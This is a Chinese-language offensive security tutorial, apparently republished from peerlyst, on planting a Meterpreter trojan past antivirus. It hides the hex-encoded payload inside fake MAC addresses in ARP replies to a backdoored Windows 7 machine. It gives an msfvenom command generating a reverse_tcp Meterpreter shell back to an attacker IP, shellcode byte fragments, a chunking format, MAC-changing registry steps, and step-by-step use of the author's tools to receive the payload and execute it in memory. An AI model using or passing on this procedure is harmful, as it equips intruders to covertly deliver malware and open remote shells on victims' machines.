如何通過ARP通信繞過殺毒軟體並種植木馬?
在進入正文之前,我想先介紹一下ARP攻擊在你的網路中是如何進行的:
步驟一:系統A對所有機器廣播:誰是192.168.1.5,我想知道你的MAC地址
步驟二:系統B發送一個數據包對廣播作出回應:我是192.168.1.5,這是我的MAC地址。這一步驟是這篇文章的重點,我們會通過這一步驟進行木馬的傳輸。步驟三:對這種攻擊無關緊要。
因為攻擊者可以通過MAC地址傳輸他們的位元組碼,這是黑客通過網路悄悄地傳輸木馬的另一條高速公路。相信我,這是一個很棒的方法,雖然傳輸的速度很慢。
由於伺服器或者客戶端總是每天24小時在網路中在線(特別是伺服器),所以你不用擔心你需要多長時間來建立鏈接並且傳輸木馬。
在這種攻擊中,攻擊者需要兩台電腦,但是你可以只用一台電腦就可達到目的。但是我還是想站在攻擊者角度說明一下如何通過兩個兩個系統進行攻擊。攻擊方一個系統的版本是linux,第二個系統的版本是Win7-SP1。
靶機的操作系統也是Win7-SP,所以我們一共有3個系統。在這篇文章中,後門就充當圖片一中的系統A,最後後門通過ARP通信從攻擊機(macchanger系統)下載木馬。在這種情況下,我的後門試圖在ARP通信中下載一個meterpreter木馬。這篇文章中,從192.168.1.113(存在後門的系統)到192.168.1.5(macchanger系統)的ARP通信38分鐘後,我們得到了一個Meterpreter後門,是由192.168.1.113到192.168.1.50(kali)。
圖片二:通過arp進行攻擊的步驟
步驟一:被後門感染的系統發送ARP請求,尋找192.168.1.5(攻擊機器1-WIN7)
步驟二:攻擊機器1用假的mac進行回應。
注意:假的MAC是將meterpreter後門進行十六進位編碼,並且通過APR傳輸將這些信息注入到MAC地址中,直接發送到被攻擊的機器(有後門的機器)。
步驟三:被攻擊的機器將二進位代碼解析,植入meterpreter木馬,連接到了攻擊系統2-kali linux(在37分鐘後成功)中。
這種攻擊方法的確不是很快,但是它是可行的。不過我們在這種攻擊中也存在一些問題。至於哪一方面存在問題呢?在我解釋哪存在問題之前,我先用一個簡單的例子給你展示一下我的代碼是如何進行工作的:
圖片三:macchanger系統回應注入木馬的假mac地址的BAT文件
注入木馬位元組:
你在圖片三的第一行已經看到我們有一個MAC地址:00fc4883e4f0。這個MAC地址有兩部分,第一部分是00,第二部分是fc4883e4f0。第二部分是meterpreter木馬第一行的第一個位元組。這不是一個MAC地址,但是你可以用它來偽裝成MAC地址進行ARP通信。
使用我的工具Payload_to_Mac.exe可以很簡單的設置和更改NIC的網路介面連接的MAC地址。這個工具就像linux中的macchanger工具。在圖片三中的第一行,這個工具為"Local Area Connection"設置我們的MAC地址。為什麼我們要做這些呢?
這是因為我想用這個注入木馬的MAC地址回應ARP請求。所以我們已經做了這些(圖4):注意:
「local Area Connection」是我們的Macchanger機器。infected系統是我們存在後門的機器。
圖片四
在上圖中,我們從三個回復中已經得到了木馬的位元組:
{ fc4883e4f0 + e8cc000000 + 4151415052 } == fc4883e4f0e8cc0000004151415052n
存在後門我們需要攻擊的機器ip是:192.168.1.113,我們更改mac進行攻擊的win7機器的ip是:192.168.1.5
現在可以比較圖三和圖四,這樣你可以發現這種攻擊是怎麼通過ARP通信把後門植入的。
注意:在Linux中你可以使用arpspoof,ettercap這些工具進行攻擊,但是這些工具可能被一些殺毒軟體或者防火牆攔截。不過我的這種方法被殺毒軟體發現的幾率是特別小的。
在這種攻擊方法中,MAC地址重複是可能發生的另外一個問題,所以我們在圖片6中提出了降低問題發生幾率的方法。例子到這就說到這了。現在,我想說一下我們在這種攻擊方法中遇到的問題。
圖片五
上圖中,我們可以發現我們通過響應,得到了這些木馬位元組:
{ fc4883e4f0 + 000c4dabc000 + e8cc000000 + 4151415052 } == fc4883e4f0000c4dabc000e8cc0000004151415052n
在圖片五中,你會發現我們由於我們的payload構造不正確導致有一個錯誤的MAC地址。那麼我們應該怎麼修復這個問題呢?
圖片六
我在圖片六中找到了一些解決方法。你可以將payload從分成兩部分到分成三部分。
00{payload} ===> 00{payload}00f0n
現在,可以在後門代碼中檢查新的格式,當你收到一個MAC地址,而沒有第三部分時,代碼應該丟棄該MAC地址。因為這是未知的響應,所以這是無效的注入有效載荷。現在我們可以開始用我的工具進行攻擊了,但是第一步你需要生成木馬:
在kali中,你可以使用msfvenom生成木馬。kali的ip地址是192.168.1.50
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > /root/desktop/payload.txtn
現在你應該把payload.txt裡面的內容複製到windows 攻擊機(192.168.1.5)中.如圖片七所示:
使用Payload_to_Mac.exe工具:
這一步驟你需要使用在圖七中生成的payload以及圖八所示的工具。你需要複製payload.txt裡面的內容在你輸入」null」之後。使用方法:Payload_to_Mac.exe null payload
注意:這一工具需要系統許可權用來更改mac地址。你可以不帶參數使用這個工具,這樣你可以看到所有的用法:
在下面圖片中,你可以看到我使用null+payload選項的輸出:
圖8-1:選擇null+payload
現在,你應該把這個工具的所有輸出複製到一個BAT文件夾中,就像圖九給出的例子Macchanger.bat一樣,並且在運行是需要使用管理員許可權。
在這一 步驟,你需要在文件的第一行添加像圖九一樣的內容。這個MAC地址是在我的後門代碼中是ARP通信開始的標誌。所以,需要添加這一行,並且保存他。
在這一個步驟,你應該再在最後一行添加一行新的MAC地址(就像圖片10)。
這個mac地址是ARP通信結束的標誌。現在在此步驟中,您應該檢查網路適配器和註冊表Regkey_Parent中的這些屬性:要更改Win7中的mac地址,您需要通過此路徑在Windows中找到此註冊表地址:
"SYSTEMCurrentControlSetControlClass{4D36E972-E325-11CE-BFC1-08002BE10318}"n
通過檢查這個路徑,你可以找到你的Parent_Regkey。我在我電腦上找到的parent_key是0007(圖十一所示),因為在007中我找到了我的NIC的「Dirver Desc」。
Driver Desc = Intel? PRO/1000 MT Networkn
您可以看到我的網路連接「本地連接」屬性與此Regkey相同,都是「英特爾?PRO / 1000
MT網路」,所以我的Parent_REGKEY是0007.這個數字在不同的機器上是不一樣的。最後我應該將所有「連接名稱」從「本地網路連接(LocalNetwork Connection)」更改為「本地連接(Local Area connection)」。注意:讓本地連接的ip地址設置為靜態的。值為:192.168.1.5
在這一步驟,你應該使用靜態的IP地址:192.168.1.5,在圖11你可以看到如何設置你的windows。
注意:如果你在Bat文件中的設置與註冊表以及NIC名稱不匹配,這個工具不能改變你的MAC地址。
現在我對Payload_to_mac.exe已經設置完成,但是你需要在靶機執行NativePayload_ARP.exe工具,這一步對攻擊來說非常重要。首先運行NativePayload_ARP.exe(靶機)接下來在運行Payload_to_mac.exe(攻擊機1)
現在你可以使用NativePayload_ARP.exe通過ARP通信傳輸Meterpreter木馬,並且在內存中執行meterpreter後門。
NativePayload_ARP.exe工具使用步驟:
步驟一:
你可以使用這個工具,就像圖12一樣,不帶任何參數。
運行程序之後,你可以輸入你要進行ARP通信的IP地址(攻擊機1)。在我的環境中,我輸入192.168.1.5,敲回車。接下來為了發送ARP請求你應該輸入你的本地IP地址,也就是被攻擊的機器的IP。在這個環境,我輸入的是192.168.1.113.
注意:靶機的ip地址是192.168.1.113,我的後門(NativePayload_ARP.exe)是在這台機器上執行的。如圖12
在38分鐘之後,我終於得到了meterpreter反彈回來的木馬。(圖13)
我使用的是世界頂尖的殺毒軟體,不過我在沒有任何編碼的情況下繞過了他。
ARP traffic_騰訊視頻 https://v.qq.com/x/page/p0388ur1g27.html
注意:
我的github帳戶被黑客攻擊,有人更改了NativePayload_ARP(3次)的源代碼,並更改了我的exe文件,所以我的github中的EXE文件被我刪除,所以你需要自己去編譯代碼。:)
本文參考來源於peerlyst,如若轉載,請註明來源於嘶吼: 如何通過ARP通信繞過殺毒軟體並種植木馬? 更多內容請關注「嘶吼專業版」——Pro4hou
推薦閱讀:
TAG:信息安全 |